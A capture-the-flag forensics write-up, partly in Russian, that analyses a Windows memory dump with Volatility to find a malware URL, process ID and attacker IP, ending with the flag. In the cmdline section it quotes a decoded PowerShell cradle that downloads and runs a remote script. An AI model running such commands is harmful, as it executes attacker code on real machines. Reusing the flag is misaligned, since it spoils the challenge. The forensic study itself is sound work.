###### tags: `HackTheBox` `round 2`
# CyberSanta Honeypot
```
Santa really encourages people to be at his good list but sometimes he is a bit naughty himself. He is using a Windows 7 honeypot to capture any suspicious action. Since he is not a forensics expert, can you help him identify any indications of compromise?
Find the full URL used to download the malware
Find the malicious's process ID
Find the attackers IP
Flag Format:HTB{md5sum(http://url.com/path.foo_PID_127.0.0.1)}
Download Link: http://46.101.25.140/forensics_honeypot.zip
Санта действительно поощряет людей быть в его хорошем списке, но иногда он сам немного капризничает. Он использует ловушку Windows 7 для отслеживания любых подозрительных действий. Поскольку он не является экспертом в области криминалистики, можете ли вы помочь ему определить какие-либо признаки взлома?
Найдите полный URL-адрес, используемый для загрузки вредоносного ПО
Найдите идентификатор вредоносного процесса
Найдите IP злоумышленников
```
## Analyse with volatility
### info
```
python2 ~/git/volatility/vol.py -f ./honeypot.raw imageinfo
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/home/john/Документы/ctf/hackthebox/cybersanta/honeypot/honeypot.raw)
PAE type : PAE
DTB : 0x185000L
KDBG : 0x82930c68L
Number of Processors : 1
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0x82931d00L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2021-11-25 19:14:12 UTC+0000
Image local date and time : 2021-11-25 11:14:12 -0800
```
### process tree
```
python2 ~/git/volatility/vol.py -f ./honeypot.raw --profile Win7SP1x86_23418 pstree
* Подозрительные процессы
.. 0x858326b8:svchost.exe 572 400 11 368 2021-11-26 05:12:17 UTC+0000
... 0x84b88788:WmiPrvSE.exe 3112 572 8 119 2021-11-25 19:13:24 UTC+0000
... 0x84ada2d0:dllhost.exe 168 572 6 88 2021-11-25 19:14:13 UTC+0000
.. 0x841e6470:cygrunsrv.exe 1872 400 6 100 2021-11-25 19:12:20 UTC+0000
... 0x858cad28:cygrunsrv.exe 1612 1872 0 ------ 2021-11-25 19:12:21 UTC+0000
.... 0x858d5d28:sshd.exe 1676 1612 4 100 2021-11-25 19:12:21 UTC+0000
. 0x85dacd28:regsvr32.exe 3108 2856 0 ------ 2021-11-25 19:12:38 UTC+0000
0x8420dd28:powershell.exe 2700 3720 13 444 2021-11-25 19:13:50 UTC+0000
. 0x85d8db00:whoami.exe 4028 2700 0 ------ 2021-11-25 19:14:01 UTC+0000
. 0x84289030:HOSTNAME.EXE 4036 2700 0 ------ 2021-11-25 19:14:01 UTC+0000
```
### Browser history
```
python2 ~/git/volatility/vol.py -f ./honeypot.raw --profile Win7SP1x86_23418 iehistory
* Подозрительные закачки:
Process: 3344 iexplore.exe Cache type "URL " at 0x709cf80 Record length: 0x380 Location: https://windowsliveupdater.com/christmas_update.hta Last modified: 2021-11-25 18:50:07 UTC+0000 Last accessed: 2021-11-25 19:13:47 UTC+0000 File Offset: 0x380, Data Offset: 0x9c, Data Length: 0xb4 File: christmas_update[1].hta
Data: HTTP/1.1 200 OK Content-Type: application/octet-stream
```
### List commands of console
```
python2 ~/git/volatility/vol.py -f ./honeypot.raw --profile Win7SP1x86_23418 cmdscan
Там видно запуск powershell, dumpit
```
### Посмотрим параметры запуска sshd, powershell и WmiPrvSE
```
sshd: python2 ~/git/volatility/vol.py -f ./honeypot.raw --profile Win7SP1x86_23418 cmdline -p 1676
WmiPrvSE: python2 ~/git/volatility/vol.py -f ./honeypot.raw --profile Win7SP1x86_23418 cmdline -p 3112
powershell: python2 ~/git/volatility/vol.py -f ./honeypot.raw --profile Win7SP1x86_23418 cmdline -p 2700
Для powershell нашлись параметры:
aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
base64 -d:
iex ((new-object net.webclient).downloadstring('https://windowsliveupdater.com/update.ps1'))
```
### info about net process
```
python2 ~/git/volatility/vol.py -f ./honeypot.raw --profile Win7SP1x86_23418 netscan
тут видим, что локальный адрес машины: 10.0.2.15
и ip, с которыми установлено соединение:
147.182.172.189
172.67.177.22
204.79.197.203
212.205.126.106
93.184.220.29
95.100.210.141
```
## flag:
```
Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}
1) https://windowsliveupdater.com/update.ps1_2700_147.182.172.189
HTB{)
2) https://windowsliveupdater.com/update.ps1_2700_172.67.177.22
HTB{}
3) https://windowsliveupdater.com/update.ps1_2700_204.79.197.203
HTB{}
4) https://windowsliveupdater.com/update.ps1_2700_212.205.126.106
HTB{}
5) https://windowsliveupdater.com/update.ps1_2700_93.184.220.29
HTB{}
6) https://windowsliveupdater.com/update.ps1_2700_95.100.210.141
HTB{}
```
"Не подходит ни один ((("
### Чутка не угадал с нагрузкой, хотя и в подозрительных закачках она засветилась
```
HTB{https://windowsliveupdater.com/christmas_update.hta_2700_147.182.172.189 | md5sum}
HTB{969b934d7396d043a50a37b70e1e010a}
```
Sign in with Wallet
Connect another wallet